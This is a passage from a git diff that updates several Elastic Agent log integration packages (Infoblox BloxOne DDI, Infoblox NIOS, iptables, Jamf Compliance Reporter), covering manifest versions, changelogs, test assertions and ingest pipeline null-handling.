infoblox_bloxone_ddi.dns_data.lame_ttl - infoblox_bloxone_ddi.dns_data.created_at - infoblox_bloxone_ddi.dns_data.id + - infoblox_bloxone_ddi.dns_data.type + - infoblox_bloxone_ddi.dns_data.absolute.name.spec + - infoblox_bloxone_ddi.dns_data.absolute.zone.name + - infoblox_bloxone_ddi.dns_data.name_in.zone + - infoblox_bloxone_ddi.dns_data.rdata_value if: ctx.tags == null || !(ctx.tags.contains('preserve_duplicate_custom_fields')) ignore_failure: true ignore_missing: true diff --git a/packages/infoblox_bloxone_ddi/data_stream/dns_data/fields/ecs.yml b/packages/infoblox_bloxone_ddi/data_stream/dns_data/fields/ecs.yml index 04b28dc660f..4ef70f75af8 100644 --- a/packages/infoblox_bloxone_ddi/data_stream/dns_data/fields/ecs.yml +++ b/packages/infoblox_bloxone_ddi/data_stream/dns_data/fields/ecs.yml @@ -1,5 +1,20 @@ +- external: ecs + name: dns.answers + type: group +- external: ecs + name: dns.answers.data - external: ecs name: dns.answers.ttl +- external: ecs + name: dns.answers.type +- external: ecs + name: dns.question.name +- external: ecs + name: dns.question.registered_domain +- external: ecs + name: dns.question.subdomain +- external: ecs + name: dns.question.type - external: ecs name: ecs.version - external: ecs diff --git a/packages/infoblox_bloxone_ddi/docs/README.md b/packages/infoblox_bloxone_ddi/docs/README.md index da6d9522578..982b96a446b 100644 --- a/packages/infoblox_bloxone_ddi/docs/README.md +++ b/packages/infoblox_bloxone_ddi/docs/README.md @@ -1433,7 +1433,14 @@ An example event for `dns_data` looks as following: | data_stream.dataset | Data stream dataset. | constant_keyword | | data_stream.namespace | Data stream namespace. | constant_keyword | | data_stream.type | Data stream type. | constant_keyword | +| dns.answers | An array containing an object for each answer section returned by the server. The main keys that should be present in these objects are defined by ECS. Records that have more information may contain more keys than what ECS defines. Not all DNS data sources give all details about DNS answers. At minimum, answer objects must contain the `data` key. If more information is available, map as much of it to ECS as possible, and add any additional fields to the answer objects as custom fields. | group | +| dns.answers.data | The data describing the resource. The meaning of this data depends on the type and class of the resource record. | keyword | | dns.answers.ttl | The time interval in seconds that this resource record may be cached before it should be discarded. Zero values mean that the data should not be cached. | long | +| dns.answers.type | The type of data contained in this resource record. | keyword | +| dns.question.name | The name being queried. If the name field contains non-printable characters (below 32 or above 126), those characters should be represented as escaped base 10 integers (\DDD). Back slashes and quotes should be escaped. Tabs, carriage returns, and line feeds should be converted to \t, \r, and \n respectively. | keyword | +| dns.question.registered_domain | The highest registered domain, stripped of the subdomain. For example, the registered domain for "foo.example.com" is "example.com". This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last two labels will not work well for TLDs such as "co.uk". | keyword | +| dns.question.subdomain | The subdomain is all of the labels under the registered_domain. If the domain has multiple levels of subdomain, such as "sub2.sub1.example.com", the subdomain field should contain "sub2.sub1", with no trailing period. | keyword | +| dns.question.type | The type of record being queried. | keyword | | ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | | event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | | event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | diff --git a/packages/infoblox_bloxone_ddi/manifest.yml b/packages/infoblox_bloxone_ddi/manifest.yml index e1649131343..ba058cf6ca7 100644 --- a/packages/infoblox_bloxone_ddi/manifest.yml +++ b/packages/infoblox_bloxone_ddi/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: infoblox_bloxone_ddi title: Infoblox BloxOne DDI -version: "1.14.1" +version: "1.16.0" description: Collect logs from Infoblox BloxOne DDI with Elastic Agent. type: integration categories: @@ -10,7 +10,7 @@ categories: - dns_security conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 screenshots: - src: /img/infoblox-bloxone-ddi-screenshot.png title: Infoblox BloxOne DDI dashboard screenshot @@ -52,6 +52,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: proxy_url type: text title: Proxy URL diff --git a/packages/infoblox_nios/_dev/deploy/docker/docker-compose.yml b/packages/infoblox_nios/_dev/deploy/docker/docker-compose.yml index 34637d7c378..00a3278e1bf 100644 --- a/packages/infoblox_nios/_dev/deploy/docker/docker-compose.yml +++ b/packages/infoblox_nios/_dev/deploy/docker/docker-compose.yml @@ -7,14 +7,12 @@ services: - ${SERVICE_LOGS_DIR}:/var/log command: /bin/sh -c "cp /sample_logs/* /var/log/" infoblox_nios-log-tcp: - image: docker.elastic.co/observability/stream:v0.8.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9027 -p=tcp /sample_logs/log.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9027 -p=tcp /sample_logs/log.log infoblox_nios-log-udp: - image: docker.elastic.co/observability/stream:v0.8.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9028 -p=udp /sample_logs/log.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9028 -p=udp /sample_logs/log.log diff --git a/packages/infoblox_nios/changelog.yml b/packages/infoblox_nios/changelog.yml index fd4f8cd4150..d8ea99d8413 100644 --- a/packages/infoblox_nios/changelog.yml +++ b/packages/infoblox_nios/changelog.yml @@ -1,7 +1,22 @@ # newer versions go on top +- version: "1.21.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9402 +- version: "1.20.3" + changes: + - description: Remove incorrect `client.domain` mapping from dns logs. + type: bugfix + link: https://github.com/elastic/integrations/pull/9351 +- version: "1.20.2" + changes: + - description: Clean up null handling, formatting. + type: bugfix + link: https://github.com/elastic/integrations/pull/9180 - version: "1.20.1" changes: - - description: Changed owners + - description: Changed owners. type: enhancement link: https://github.com/elastic/integrations/pull/8943 - version: "1.20.0" @@ -9,7 +24,6 @@ - description: Handle RPZ Hit log messages. type: enhancement link: https://github.com/elastic/integrations/pull/8936 - - version: "1.19.4" changes: - description: Deal with DNS data that ends in `...` and fix network.transport to only include udp/tcp. diff --git a/packages/infoblox_nios/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json b/packages/infoblox_nios/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json index de5ff858d0c..4a618b73d31 100644 --- a/packages/infoblox_nios/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json +++ b/packages/infoblox_nios/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json @@ -389,7 +389,6 @@ { "@timestamp": "2024-03-09T23:59:59.000Z", "client": { - "domain": "config.nos-avg.cz", "ip": "192.168.0.1", "port": 59735 }, @@ -423,7 +422,6 @@ }, "related": { "hosts": [ - "config.nos-avg.cz", "infoblox.localdomain" ], "ip": [ @@ -437,7 +435,6 @@ { "@timestamp": "2024-03-09T23:59:59.000Z", "client": { - "domain": "config.nos-avg.cz", "ip": "192.168.0.1", "port": 59735 }, @@ -928,7 +925,6 @@ { "@timestamp": "2024-03-11T23:51:31.000Z", "client": { - "domain": "test.com", "ip": "192.168.0.1", "port": 57027 }, @@ -984,7 +980,6 @@ { "@timestamp": "2024-03-11T23:51:31.000Z", "client": { - "domain": "test.com", "ip": "192.168.0.1", "port": 57027 }, @@ -1288,7 +1283,6 @@ { "@timestamp": "2024-04-14T16:16:05.000Z", "client": { - "domain": "ocsp.digicert.com", "ip": "192.168.1.90", "port": 64727 }, @@ -1356,7 +1350,6 @@ { "@timestamp": "2024-04-14T16:16:05.000Z", "client": { - "domain": "ocsp.digicert.com", "ip": "192.168.1.90", "port": 64727 }, @@ -1392,9 +1385,6 @@ "pid": 2588 }, "related": { - "hosts": [ - "ocsp.digicert.com" - ], "ip": [ "192.168.1.90", "10.50.1.227" @@ -2451,7 +2441,6 @@ "name": "Bredband2 AB" } }, - "domain": "abugtera.tun.p2.42", "geo": { "city_name": "Linköping", "continent_name": "Europe", @@ -2527,7 +2516,6 @@ { "@timestamp": "2024-11-27T11:53:09.000Z", "client": { - "domain": "version.bind", "ip": "10.4.71.204", "port": 40026 }, diff --git a/packages/infoblox_nios/data_stream/log/_dev/test/system/test-logfile-config.yml b/packages/infoblox_nios/data_stream/log/_dev/test/system/test-logfile-config.yml index bcf54b7dcc6..23b7d77d581 100644 --- a/packages/infoblox_nios/data_stream/log/_dev/test/system/test-logfile-config.yml +++ b/packages/infoblox_nios/data_stream/log/_dev/test/system/test-logfile-config.yml @@ -6,3 +6,5 @@ vars: data_stream: vars: preserve_original_event: true +assert: + hit_count: 105 diff --git a/packages/infoblox_nios/data_stream/log/_dev/test/system/test-tcp-config.yml b/packages/infoblox_nios/data_stream/log/_dev/test/system/test-tcp-config.yml index d4096d36a44..e2498f650dc 100644 --- a/packages/infoblox_nios/data_stream/log/_dev/test/system/test-tcp-config.yml +++ b/packages/infoblox_nios/data_stream/log/_dev/test/system/test-tcp-config.yml @@ -7,3 +7,5 @@ data_stream: vars: listen_port: 9027 preserve_original_event: true +assert: + hit_count: 105 diff --git a/packages/infoblox_nios/data_stream/log/_dev/test/system/test-udp-config.yml b/packages/infoblox_nios/data_stream/log/_dev/test/system/test-udp-config.yml index e2b73a79118..6772c3c0bd6 100644 --- a/packages/infoblox_nios/data_stream/log/_dev/test/system/test-udp-config.yml +++ b/packages/infoblox_nios/data_stream/log/_dev/test/system/test-udp-config.yml @@ -7,3 +7,5 @@ data_stream: vars: listen_port: 9028 preserve_original_event: true +assert: + hit_count: 105 diff --git a/packages/infoblox_nios/data_stream/log/_dev/test/system/test-udp-tz-config.yml b/packages/infoblox_nios/data_stream/log/_dev/test/system/test-udp-tz-config.yml index 1dd259ec57d..d83a8bcaba0 100644 --- a/packages/infoblox_nios/data_stream/log/_dev/test/system/test-udp-tz-config.yml +++ b/packages/infoblox_nios/data_stream/log/_dev/test/system/test-udp-tz-config.yml @@ -8,3 +8,5 @@ data_stream: listen_port: 9028 preserve_original_event: true tz_offset: "+0500" +assert: + hit_count: 105 diff --git a/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/default.yml index b9fdae66853..a13087292ed 100644 --- a/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -79,13 +79,13 @@ processors: - set: field: '@timestamp' value: '{{{event.created}}}' - if: "ctx.event?.created != null" + if: ctx.event?.created != null override: true # If individual pipelines has timestamp, they should take priority. This makes @timestamp < event.created conforming to ECS. - set: field: '@timestamp' value: '{{{_tmp.timestamp}}}' - if: "ctx._tmp?.timestamp != null" + if: ctx._tmp?.timestamp != null override: true - convert: field: _tmp.host.ip diff --git a/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/pipeline_audit.yml b/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/pipeline_audit.yml index 0aa6269588d..668f023cd85 100644 --- a/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/pipeline_audit.yml +++ b/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/pipeline_audit.yml @@ -90,10 +90,10 @@ processors: if (ctx.infoblox_nios == null) { ctx['infoblox_nios'] = new HashMap(); } - if (ctx.infoblox_nios?.log == null) { + if (ctx.infoblox_nios.log == null) { ctx.infoblox_nios['log'] = new HashMap(); } - if (ctx.infoblox_nios?.log?.audit == null) { + if (ctx.infoblox_nios.log.audit == null) { ctx.infoblox_nios.log['audit'] = new HashMap(); } for (Map.Entry m : ctx.audit.entrySet()) { diff --git a/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/pipeline_dns.yml b/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/pipeline_dns.yml index f7bd6c6c86f..d24aeafb017 100644 --- a/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/pipeline_dns.yml +++ b/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/pipeline_dns.yml @@ -8,11 +8,11 @@ processors: - "^transfer of '%{DATA:dns.question.name}/%{DATA:dns.question.class}' from %{IP:client.ip}#%{NUMBER:client.port:long}:? %{GREEDYDATA:infoblox_nios.log.dns.message}$" - "^validating %{DATA:dns.question.name}/%{WORD:dns.question.type}: %{GREEDYDATA:infoblox_nios.log.dns.message}$" - "^(%{NOTSPACE:infoblox_nios.log.dns.category}:)?\\s*%{CLIENT} updating zone '%{DATA:dns.question.name}/%{DATA:dns.question.class}': %{GREEDYDATA:infoblox_nios.log.dns.message}$" - - "^(%{NOTSPACE:infoblox_nios.log.dns.category}:)?\\s*%{CLIENT} \\(%{DATA:client.domain}\\): %{VIEW}?query failed %{GREEDYDATA:infoblox_nios.log.dns.message}$" + - "^(%{NOTSPACE:infoblox_nios.log.dns.category}:)?\\s*%{CLIENT} \\(%{DATA}\\): %{VIEW}?query failed %{GREEDYDATA:infoblox_nios.log.dns.message}$" - "^(%{NOTSPACE:infoblox_nios.log.dns.category}:)?\\s*%{CLIENT} \\(%{DATA:infoblox_nios.log.dns.before_query}\\): rewriting query name %{DATA} to '%{DATA:infoblox_nios.log.dns.after_query}', type %{DATA:dns.question.type}$" - - "^(%{NOTSPACE:infoblox_nios.log.dns.category}:)?\\s*%{CLIENT} \\(%{DATA:client.domain}\\): %{VIEW}?query: %{DATA:dns.question.name} %{DATA:dns.question.class} %{WORD:dns.question.type} %{DATA:infoblox_nios.log.dns.header_flags} \\(%{IP:server.ip}\\)$" + - "^(%{NOTSPACE:infoblox_nios.log.dns.category}:)?\\s*%{CLIENT} \\(%{DATA}\\): %{VIEW}?query: %{DATA:dns.question.name} %{DATA:dns.question.class} %{WORD:dns.question.type} %{DATA:infoblox_nios.log.dns.header_flags} \\(%{IP:server.ip}\\)$" - "^(%{NOTSPACE:infoblox_nios.log.dns.category}:)?\\s*%{CLIENT} %{DATA:network.transport}: %{VIEW}?query: %{DATA:dns.question.name} %{DATA:dns.question.class} %{WORD:dns.question.type} response: %{DATA:dns.response_code} %{DATA:infoblox_nios.log.dns.header_flags}$" - - "^(%{NOTSPACE:infoblox_nios.log.dns.category}:)?\\s*%{CLIENT} \\(%{DATA:client.domain}\\): transfer of '%{DATA:dns.question.name}/%{DATA:dns.question.class}': %{GREEDYDATA:infoblox_nios.log.dns.message}$" + - "^(%{NOTSPACE:infoblox_nios.log.dns.category}:)?\\s*%{CLIENT} \\(%{DATA}\\): transfer of '%{DATA:dns.question.name}/%{DATA:dns.question.class}': %{GREEDYDATA:infoblox_nios.log.dns.message}$" - "^(%{NOTSPACE:infoblox_nios.log.dns.category}:)?\\s*CEF:0\\|Infoblox\\|NIOS\\|%{GREEDYDATA:infoblox_nios.log.dns.version}\\|RPZ-%{DATA:dns.answers.type}\\|%{DATA:infoblox_nios.log.dns.answers_policy}\\|\\d+\\|app=DNS dst=%{IP:server.ip} src=%{IP:client.ip} spt=%{NUMBER:client.port:long} view=%{DATA:infoblox_nios.log.dns.view_name} qtype=%{WORD:dns.question.type} msg=%{GREEDYDATA:infoblox_nios.log.dns.message}$" - "^(%{NOTSPACE:infoblox_nios.log.dns.category}:)?\\s*%{GREEDYDATA:_tmp.timestamp} %{CLIENT} %{DATA:network.transport}: %{VIEW}?query: %{DATA:dns.question.name} %{DATA:dns.question.class} %{WORD:dns.question.type} response: %{DATA:dns.response_code} %{DATA:infoblox_nios.log.dns.header_flags} %{GREEDYDATA:repeat_message}$" - "^(%{NOTSPACE:infoblox_nios.log.dns.category}:)?\\s*%{GREEDYDATA:_tmp.timestamp} %{CLIENT} %{DATA:network.transport}: %{VIEW}?query: %{DATA:dns.question.name} %{DATA:dns.question.class} %{WORD:dns.question.type} response: %{DATA:dns.response_code} %{DATA:infoblox_nios.log.dns.header_flags}$" @@ -92,7 +92,7 @@ processors: map.put('type', new ArrayList()); map.put('data', new ArrayList()); - for (def i = 0; i < arr?.length; i++) { + for (def i = 0; i < arr.length; i++) { def response = splitUnquoted(arr[i], " "); if (response.size() >= 4) { map['name'].add(response[0]); @@ -124,7 +124,7 @@ processors: if: ctx.dns?.answers?.data instanceof List source: | def hash = new ArrayList(); - for(data in ctx.dns?.answers?.data){ + for(data in ctx.dns.answers.data){ def n = data.length(); if(data.charAt(n-1).toString() == '.'){ def data_substring = data.substring(0,n-1) + data.substring(n); @@ -141,7 +141,7 @@ processors: if: ctx.dns?.answers?.name instanceof List source: | def hash = new ArrayList(); - for(name in ctx.dns?.answers?.name){ + for(name in ctx.dns.answers.name){ def n = name.length(); if(name.charAt(n-1).toString() == '.'){ def name_substring = name.substring(0,n-1) + name.substring(n); @@ -198,12 +198,6 @@ processors: if: ctx.server?.ip != null allow_duplicates: false ignore_failure: true - - append: - field: related.hosts - value: '{{{client.domain}}}' - if: ctx.client?.domain != null - allow_duplicates: false - ignore_failure: true - foreach: field: dns.answers.name if: ctx.dns?.answers?.name != null @@ -251,7 +245,7 @@ processors: ctx.put('dns', hm); } ctx.dns.put('header_flags', hf); - - registered_domain: + - registered_domain: field: "dns.question.name" target_field: "dns.question" if: ctx.dns?.question != null diff --git a/packages/infoblox_nios/data_stream/log/fields/ecs.yml b/packages/infoblox_nios/data_stream/log/fields/ecs.yml index a791189c471..58ddc8313d0 100644 --- a/packages/infoblox_nios/data_stream/log/fields/ecs.yml +++ b/packages/infoblox_nios/data_stream/log/fields/ecs.yml @@ -1,5 +1,3 @@ -- external: ecs - name: client.domain - external: ecs name: client.geo.city_name - external: ecs diff --git a/packages/infoblox_nios/data_stream/log/sample_event.json b/packages/infoblox_nios/data_stream/log/sample_event.json index aff57adf68e..4af8cbf9265 100644 --- a/packages/infoblox_nios/data_stream/log/sample_event.json +++ b/packages/infoblox_nios/data_stream/log/sample_event.json @@ -76,4 +76,4 @@ "user": { "name": "user" } -} +} \ No newline at end of file diff --git a/packages/infoblox_nios/docs/README.md b/packages/infoblox_nios/docs/README.md index eb79adcffb6..b509f8846b7 100644 --- a/packages/infoblox_nios/docs/README.md +++ b/packages/infoblox_nios/docs/README.md @@ -231,7 +231,6 @@ An example event for `log` looks as following: "name": "user" } } - ``` **Exported fields** @@ -242,7 +241,6 @@ An example event for `log` looks as following: | client.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | | client.as.organization.name | Organization name. | keyword | | client.as.organization.name.text | Multi-field of `client.as.organization.name`. | match_only_text | -| client.domain | The domain name of the client system. This value may be a host name, a fully qualified domain name, or another host naming format. The value may derive from the original event or be added from enrichment. | keyword | | client.geo.city_name | City name. | keyword | | client.geo.continent_name | Name of the continent. | keyword | | client.geo.country_iso_code | Country ISO code. | keyword | diff --git a/packages/infoblox_nios/manifest.yml b/packages/infoblox_nios/manifest.yml index ebff4bb5ff7..a9513b78fe6 100644 --- a/packages/infoblox_nios/manifest.yml +++ b/packages/infoblox_nios/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: infoblox_nios title: Infoblox NIOS -version: "1.20.1" +version: "1.21.0" description: Collect logs from Infoblox NIOS with Elastic Agent. type: integration categories: diff --git a/packages/iptables/changelog.yml b/packages/iptables/changelog.yml index 5e95bd88958..ed25e1d4cae 100644 --- a/packages/iptables/changelog.yml +++ b/packages/iptables/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.16.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "1.15.2" changes: - description: Changed owners diff --git a/packages/iptables/manifest.yml b/packages/iptables/manifest.yml index 0c8ea4cab27..3e95ded6fbc 100644 --- a/packages/iptables/manifest.yml +++ b/packages/iptables/manifest.yml @@ -1,6 +1,6 @@ name: iptables title: Iptables -version: "1.15.2" +version: "1.16.0" description: Collect logs from Iptables with Elastic Agent. type: integration icons: @@ -8,7 +8,7 @@ icons: title: linux size: 299x354 type: image/svg+xml -format_version: "3.0.0" +format_version: "3.0.3" categories: - network - security diff --git a/packages/jamf_compliance_reporter/_dev/deploy/docker/docker-compose.yml b/packages/jamf_compliance_reporter/_dev/deploy/docker/docker-compose.yml index 3f0a3d88cd2..bf68a901783 100644 --- a/packages/jamf_compliance_reporter/_dev/deploy/docker/docker-compose.yml +++ b/packages/jamf_compliance_reporter/_dev/deploy/docker/docker-compose.yml @@ -1,7 +1,7 @@ version: "2.3" services: jamf-compliance-reporter-log-http-endpoint: - image: docker.elastic.co/observability/stream:v0.8.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro environment: @@ -9,8 +9,7 @@ services: - STREAM_ADDR=http://elastic-agent:9551/ command: log --start-signal=SIGHUP --delay=5s /sample_logs/log.log jamf-compliance-reporter-log-tcp: - image: docker.elastic.co/observability/stream:v0.8.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9552 -p=tcp /sample_logs/log.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9552 -p=tcp /sample_logs/log.log diff --git a/packages/jamf_compliance_reporter/changelog.yml b/packages/jamf_compliance_reporter/changelog.yml index 623a5f59fa8..d79e16252a3 100644 --- a/packages/jamf_compliance_reporter/changelog.yml +++ b/packages/jamf_compliance_reporter/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.12.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9402 +- version: "1.11.2" + changes: + - description: Clean up null handling, other checks and scripting + type: bugfix + link: https://github.com/elastic/integrations/pull/9179 - version: "1.11.1" changes: - description: Changed owners diff --git a/packages/jamf_compliance_reporter/data_stream/log/_dev/test/system/test-http-endpoint-config.yml b/packages/jamf_compliance_reporter/data_stream/log/_dev/test/system/test-http-endpoint-config.yml index d47b336671b..e4e6ec5845f 100644 --- a/packages/jamf_compliance_reporter/data_stream/log/_dev/test/system/test-http-endpoint-config.yml +++ b/packages/jamf_compliance_reporter/data_stream/log/_dev/test/system/test-http-endpoint-config.yml @@ -6,3 +6,5 @@ data_stream: vars: listen_address: 0.0.0.0 listen_port: 9551 +assert: + hit_count: 53 diff --git a/packages/jamf_compliance_reporter/data_stream/log/_dev/test/system/test-tcp-config.yml b/packages/jamf_compliance_reporter/data_stream/log/_dev/test/system/test-tcp-config.yml index 2c71dba8300..80660b1d971 100644 --- a/packages/jamf_compliance_reporter/data_stream/log/_dev/test/system/test-tcp-config.yml +++ b/packages/jamf_compliance_reporter/data_stream/log/_dev/test/system/test-tcp-config.yml @@ -6,3 +6,5 @@ data_stream: vars: listen_address: 0.0.0.0 listen_port: 9552 +assert: + hit_count: 53 diff --git a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/default.yml index a0b88196dac..ea31c9199c3 100644 --- a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -18,7 +18,7 @@ processors: if: ctx.json?.header?.event_name == 'APP_METRICS' - pipeline: name: '{{ IngestPipeline "pipeline_audit" }}' - if: ctx.json?.header?.event_name != null && ctx.json?.header?.event_name.startsWith('AUE_') + if: ctx.json?.header?.event_name?.startsWith('AUE_') == true - pipeline: name: '{{ IngestPipeline "pipeline_event" }}' if: "['AUDIO_VIDEO_DEVICE_EVENT','AUDIT_CLASS_VERIFICATION_EVENT','COMPLIANCE_REPORTER_TAMPER_EVENT','FILE_EVENT','GATEKEEPER_INFO_EVENT','GATEKEEPER_MANUAL_OVERRIDES','GATEKEEPER_QUARANTINE_LOG','HARDWARE_EVENT','LICENSE_INFO_EVENT','PREFERENCE_LIST_EVENT','PRINT_EVENT_INFORMATION','PROHIBITED_APP_BLOCKED','SIGNAL_EVENT','UNIFIED_LOG_EVENT','XPROTECT_DEFINITIONS_VERSION_INFO','XPROTECT_EVENT_LOG'].contains(ctx.json?.header?.event_name)" diff --git a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_app_metrics.yml b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_app_metrics.yml index 4170a0d979f..59a240b8272 100644 --- a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_app_metrics.yml +++ b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_app_metrics.yml @@ -136,7 +136,7 @@ processors: if: ctx.json?.app_metric_info?.cpu_percentage != null source: | ctx.host.cpu = new HashMap(); - ctx.host.cpu.usage = Math.round(ctx.json?.app_metric_info?.cpu_percentage *10) / 1000.0; + ctx.host.cpu.usage = Math.round(ctx.json.app_metric_info.cpu_percentage * 10) / 1000.0; on_failure: - set: field: event.kind diff --git a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_audit.yml b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_audit.yml index bac5015441c..ad2ef387bfe 100644 --- a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_audit.yml +++ b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_audit.yml @@ -34,12 +34,15 @@ processors: ignore_missing: true - script: lang: painless - if: ctx.json?.header?.time_seconds_epoch != 0 + if: ctx.json?.header?.time_seconds_epoch != null && ctx.json.header.time_seconds_epoch != 0 source: | - ctx.json.time_milliseconds = (long)ctx.json?.header?.time_seconds_epoch * 1000 + (long)ctx.json?.header?.time_milliseconds_offset; + ctx.json.time_milliseconds = (long)ctx.json.header.time_seconds_epoch * 1000; + if (ctx.json?.header?.time_milliseconds_offset != null && ctx.json.header.time_milliseconds_offset != 0) { + ctx.json.time_milliseconds = ctx.json.time_milliseconds + (long)ctx.json.header.time_milliseconds_offset; + } - date: field: json.time_milliseconds - if: ctx.json?.time_milliseconds != 0 + if: ctx.json?.time_milliseconds != null && ctx.json.time_milliseconds != 0 formats: - UNIX_MS on_failure: @@ -281,82 +284,82 @@ processors: value: authentication - pipeline: name: '{{ IngestPipeline "pipeline_aue_accept" }}' - if: ctx.event?.action == 'aue_accept' + if: ctx.event.action == 'aue_accept' - pipeline: name: '{{ IngestPipeline "pipeline_aue_auth" }}' - if: '["aue_auth_user", "aue_ssauthorize", "aue_ssauthmech"].contains(ctx.event?.action)' + if: '["aue_auth_user", "aue_ssauthorize", "aue_ssauthmech"].contains(ctx.event.action)' - pipeline: name: '{{ IngestPipeline "pipeline_aue_bind_and_aue_connect" }}' - if: '["aue_bind", "aue_connect"].contains(ctx.event?.action)' + if: '["aue_bind", "aue_connect"].contains(ctx.event.action)' - pipeline: name: '{{ IngestPipeline "pipeline_aue_chdir" }}' - if: ctx.event?.action == 'aue_chdir' + if: ctx.event.action == 'aue_chdir' - pipeline: name: '{{ IngestPipeline "pipeline_aue_chroot" }}' - if: ctx.event?.action == 'aue_chroot' + if: ctx.event.action == 'aue_chroot' - pipeline: name: '{{ IngestPipeline "pipeline_aue_execve" }}' - if: ctx.event?.action == 'aue_execve' + if: ctx.event.action == 'aue_execve' - pipeline: name: '{{ IngestPipeline "pipeline_aue_exit" }}' - if: ctx.event?.action == 'aue_exit' + if: ctx.event.action == 'aue_exit' - pipeline: name: '{{ IngestPipeline "pipeline_aue_kill" }}' - if: ctx.event?.action == 'aue_kill' + if: ctx.event.action == 'aue_kill' - pipeline: name: '{{ IngestPipeline "pipeline_aue_mount" }}' - if: ctx.event?.action == 'aue_mount' + if: ctx.event.action == 'aue_mount' - pipeline: name: '{{ IngestPipeline "pipeline_aue_posix_spawn" }}' - if: ctx.event?.action == 'aue_posix_spawn' + if: ctx.event.action == 'aue_posix_spawn' - pipeline: name: '{{ IngestPipeline "pipeline_aue_remove_from_group_and_aue_mac_set_proc" }}' - if: '["aue_remove_from_group", "aue_mac_set_proc"].contains(ctx.event?.action)' + if: '["aue_remove_from_group", "aue_mac_set_proc"].contains(ctx.event.action)' - pipeline: name: '{{ IngestPipeline "pipeline_aue_session" }}' - if: '["aue_session_end", "aue_session_update", "aue_session_close", "aue_session_start"].contains(ctx.event?.action)' + if: '["aue_session_end", "aue_session_update", "aue_session_close", "aue_session_start"].contains(ctx.event.action)' - pipeline: name: '{{ IngestPipeline "pipeline_aue_arguments" }}' - if: '["aue_setsockopt", "aue_shutdown"].contains(ctx.event?.action)' + if: '["aue_setsockopt", "aue_shutdown"].contains(ctx.event.action)' - pipeline: name: '{{ IngestPipeline "pipeline_aue_ssauthint" }}' - if: ctx.event?.action == 'aue_ssauthint' + if: ctx.event.action == 